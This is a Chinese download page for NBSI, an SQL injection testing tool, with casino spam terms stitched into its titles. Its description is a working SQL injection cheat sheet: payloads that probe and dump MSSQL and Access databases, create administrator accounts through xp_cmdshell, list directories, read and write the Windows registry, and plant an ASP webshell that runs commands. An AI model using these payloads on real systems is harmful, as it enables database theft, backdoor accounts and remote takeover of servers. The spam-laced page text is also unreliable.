东坡下载:内容最丰富最安全的下载站! 文件类型库|最新更新|下载分类|排行榜

杀毒相关防火墙类密码相关黑客软件系统安全安全其它木马清除账号注册杀毒软件网络安全安全卫士木马专杀
qg999钱柜娱乐安全相关安全其他 → 网站安全检测入侵工具(NBSI注入漏洞检测工具) 3.0.1 中文qg999钱柜娱乐
网站安全检测入侵工具(NBSI注入漏洞检测工具)

网站安全检测入侵工具(NBSI注入漏洞检测工具)3.0.1 中文qg999钱柜娱乐 网站安全检测入侵工具

  1. 大小:1.0M
  2. 语言:中文
  3. 平台:WinXP
  4. 更新:2016-10-06
  5. 等级:
  6. 类型:安全其他
  7. 网站:http://www.uzzf.com
  8. 授权:免费软件
  9. 厂商:
  10. 产地:国产软件
好用好玩 50%(0)
坑爹 坑爹 50%(0)
  1. 诛仙手游(唯一正版授权)1.99.5 官网最新版诛仙手游(唯一正版授权)1.99.5 官网最新版355M  |  中文  |  8.5下载
  2. 诛仙手游老虎版1.99.5安卓最新版【附模拟器】诛仙手游老虎版1.99.5安卓最新版【附模拟器397.8M  |  中文  |  6.9下载
  3. 诛仙手游攻略助手1.0 官方版 【可查宠物分布图+答题器】诛仙手游攻略助手1.0 官方版 【可查宠物分布1.1M  |  中文  |  10.0下载
软件介绍软件截图相关软件软件教程网友评论下载地址
亲,本软件被360报毒,请自行斟酌,如需使用请将软件加入360信任列表,请参照本站的 360报毒处理文档或是阅读 下载帮助

本工具功能非常强大,希望同学们用于正途,别去做一些偷鸡摸狗的令人可耻的事情,由VB语言编写的网站漏洞检测工具的名称,ASP注入漏洞检测工具,特别在SQL Server注入检测方面有极高的准确率。
1.判断是否有注入;and 1=1;and 1=22.初步判断是否是mssql;and user>03.判断数据库系统;and (select count(*) from sysobjects)>0 mssql;and (select count(*) from msysobjects)>0 access4.注入参数是字符'and [查询条件] and ''='5.搜索时没过滤参数的'and [查询条件] and '%25'='6.猜数据库;and (Select Count(*) from [数据库名])>07.猜字段;and (Select Count(字段名) from 数据库名)>08.猜字段中记录长度;and (select top 1 len(字段名) from 数据库名)>09.(1)猜字段的ascii值(access);and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0(2)猜字段的ascii值(mssql);and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>010.测试权限结构(mssql);and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));--;and 1=(SELECT IS_SRVROLEMEMBER('serveradmin'));--;and 1=(SELECT IS_SRVROLEMEMBER('setupadmin'));--;and 1=(SELECT IS_SRVROLEMEMBER('securityadmin'));--;and 1=(SELECT IS_SRVROLEMEMBER('diskadmin'));--;and 1=(SELECT IS_SRVROLEMEMBER('bulkadmin'));--;and 1=(SELECT IS_MEMBER('db_owner'));--11.添加mssql和系统的帐户;exec master.dbo.sp_addlogin username;--;exec master.dbo.sp_password null,username,password;--;exec master.dbo.sp_addsrvrolemember sysadminusername;--;exec master.dbo.xp_cmdshell 'net user usernamepassword /workstations:* /times:all/passwordchg:yes /passwordreq:yes /active:yes /add';--;exec master.dbo.xp_cmdshell 'net user usernamepassword /add';--;exec master.dbo.xp_cmdshell 'net localgroupadministrators username /add';--12.(1)遍历目录;create table dirs(paths varchar(100), id int);insert dirs exec master.dbo.xp_dirtree 'c:\';and (select top 1 paths from dirs)>0;and (select top 1 paths from dirs where paths notin('上步得到的paths'))>)(2)遍历目录;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树结构;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容13.mssql中的存储过程xp_regenumvalues 注册表根键, 子键;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值xp_regread 根键,子键,键值名;exec xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值xp_regwrite 根键,子键, 值名, 值类型, 值值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表xp_regdeletevalue 根键,子键,值名exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值14.mssql的backup创建webshelluse modelcreate table cmd(str image);insert into cmd(str) values ('<% Dim oScript %>');backup database model to disk='c:\l.asp';15.mssql内置函数;and (select @@version)>0 获得Windows的版本号;and user_name()='dbo' 判断当前系统的连接用户是不是sa;and (select user_name())>0 爆当前系统的连接用户;and (select db_name())>0 得到当前连接的数据库16.简洁的webshelluse modelcreate table cmd(str image);insert into cmd(str) values ('<%=server.createobject("wscript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%>');backup database model to disk='g:\wwwtest\l.asp';请求的时候,像这样子用:http://ip/l.asp?c=dir  
PC官方
安卓官方手机版
IOS官方手机版

网站安全检测入侵工具(NBSI注入漏洞检测工具)截图

下载地址

网站安全检测入侵工具(NBSI注入漏洞检测工具) 3.0.1 中文qg999钱柜娱乐

热门评论
最新评论
第 4 楼 美国CZ88.NET 网友 客人 发表于: 2014/11/21 3:11:53
像这种工具用于安全检测,杀毒软件哪个不报毒。怕有毒你就不要下。 支持( 2 ) 盖楼(回复)
第 3 楼 四川铁通 网友 客人 发表于: 2014/10/27 18:45:56
这个初学者不错。 支持( 0 ) 盖楼(回复)
第 2 楼 北京开心网 网友 客人 发表于: 2014/7/30 16:24:08
有病毒啊? 支持( 1 ) 盖楼(回复)
第 1 楼 吉林延吉联通 网友 客人 发表于: 2014/5/6 13:23:36
都是病毒啊 支持( 1 ) 盖楼(回复)
昵称:
表情: 高兴 可 汗 我不要 害羞 好 下下下 送花 屎 亲亲
字数: 0/500 (您的评论需要经过审核才能显示)
编辑推荐
  1. 网站安全检测入侵工具(NBSI注入漏洞检测工具) 驱动精灵万能网卡版(驱动精灵2017万能网卡版 149.3M / 06-27 / 9.5.621.1329万能网卡版
  2. 网站安全检测入侵工具(NBSI注入漏洞检测工具) 360杀毒软件32位5.0.0.8023A标准安装包 36.9M / 06-05 / 5.0.0.8023A标准安装包
  3. 网站安全检测入侵工具(NBSI注入漏洞检测工具) 360安全卫士2017电脑版11.4.0 1045 qg999钱柜娱乐【 61.4M / 04-10 / 11.4.0 1045 qg999钱柜娱乐【离线包】
  4. 网站安全检测入侵工具(NBSI注入漏洞检测工具) 腾讯电脑管家2017(QQ电脑管家)12.4.18606.2 50.6M / 04-08 / 12.4.18606.216 最新qg999钱柜娱乐
  5. 网站安全检测入侵工具(NBSI注入漏洞检测工具) 瑞星杀毒软件25.00.01.10 官方安装版 38.3M / 01-27 / 25.00.01.10 官方安装版
本类软件必备
  1. 联想管家系统安全
  2. 360卫士系统安全
  3. QQ电脑管家系统安全
  4. 瑞星杀毒杀毒相关
  5. 微盾防火墙防火墙类
  6. 广告卫士防火墙类
  7. 巨盾2013防火墙类
  8. 百度杀毒杀毒相关
  9. 兔卫士系统安全
杀毒360杀毒QQ管家百度杀毒密码QQ相册密码wifi密码网站密码防火墙avast360防火墙瑞星防火墙安全百度卫士金山卫士小红伞
报错
请简要描述您遇到的错误,我们将尽快予以修正。
转帖到论坛
轮坛转帖HTML方式 轮坛转帖UBB方式

qg999

百度360搜索搜狗搜索